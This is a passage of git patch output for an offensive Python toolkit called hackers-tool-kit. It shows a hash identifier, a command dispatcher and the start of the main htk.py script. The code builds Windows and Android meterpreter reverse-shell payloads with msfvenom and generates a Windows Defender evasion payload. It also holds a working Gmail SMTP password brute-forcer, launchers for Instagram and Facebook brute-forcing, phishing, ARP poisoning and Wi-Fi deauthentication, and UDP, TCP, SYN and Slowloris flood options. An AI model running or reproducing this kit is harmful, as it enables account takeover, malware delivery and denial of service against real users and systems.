len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -def upgrade(): - os.system("apt update && apt upgrade") -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@unkn0wn_bali\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arppois": - appois() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - found = True -mainbanner() -main() From 26184ca8f437d587f3f593b03c905885ba0733f5 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Wed, 20 Mar 2019 02:15:05 +0100 Subject: [PATCH 046/214] Delete htksecure.py --- htksecure.py | 16 ---------------- 1 file changed, 16 deletions(-) delete mode 100644 htksecure.py diff --git a/htksecure.py b/htksecure.py deleted file mode 100644 index bf09f3e..0000000 --- a/htksecure.py +++ /dev/null @@ -1,16 +0,0 @@ -import os -import sys -print "--------------------------------------------------------------------------------------------------" -print """\033[93m!WELCOME TO THE SECURE VERSION OF HACKERS-TOOL-IT WHAT THIS MEANS IS THAT -THE HACKERS-TOOL-KIT WILL BE RUN WITH PROXYCHAINS MAKING YOU NEAR ANONYMOUS EXITING THE TERMINAL -SHOULD STOP THE PROXYCHAINS NOTE SOME STUFF MIGHT NOT WORK OR MIGHT BE SLOW DUE TO THE PROXYCHAINS -YOU HAVE TO HAVE YOUR PROXYCHAINS CONFIG FILE ALREADY SETUP TO USE THIS!\033[0m""" -print "--------------------------------------------------------------------------------------------------" -print "\n" -print "\033[92mWould you like to continue? y or n\033[0m" -h = raw_input("?: ") -if h == "n": - print "follow \033[92m@unkn0wn_bali\033[0m on instagram" - sys.exit() -if h == "y": - os.system("proxychains python /root/hackers-tool-kit/htk.py") From 4462f4e73f2194ec25a63670b28f1a0e33ddf6dc Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Tue, 19 Mar 2019 21:15:41 -0400 Subject: [PATCH 047/214] Add files via upload --- htk.py | 2023 ++++++++++++++++++++++++++++++++++++++++++++++++++ htksecure.py | 39 + 2 files changed, 2062 insertions(+) create mode 100644 htk.py create mode 100644 htksecure.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..8d36411 --- /dev/null +++ b/htk.py @@ -0,0 +1,2023 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @unkn0wn_bali +#i do not give you permission to edit this script without my credit +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +def mainbanner(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +? : displays this message +clear : clears screen except for banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn TIP: "ctrl c" usually stops a script if you dont want to keep running it +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal +arppois : ARP poisoning +sslscan : ssl scan a host +payload : make a metasploit payload of your choice +crunch : Make wordlists +traff : shows your internet traffic +resa : reset account password +resu : reset unix password +hashid : find the type of hash of a hash +wafwoof : check a web application for firewall +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +\033[91m---------------------------------------------------------------------------------\033[0m + """ +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) +def wifite(): + os.system("wifite") +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +def netdev(): + os.system("netdiscover") +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ 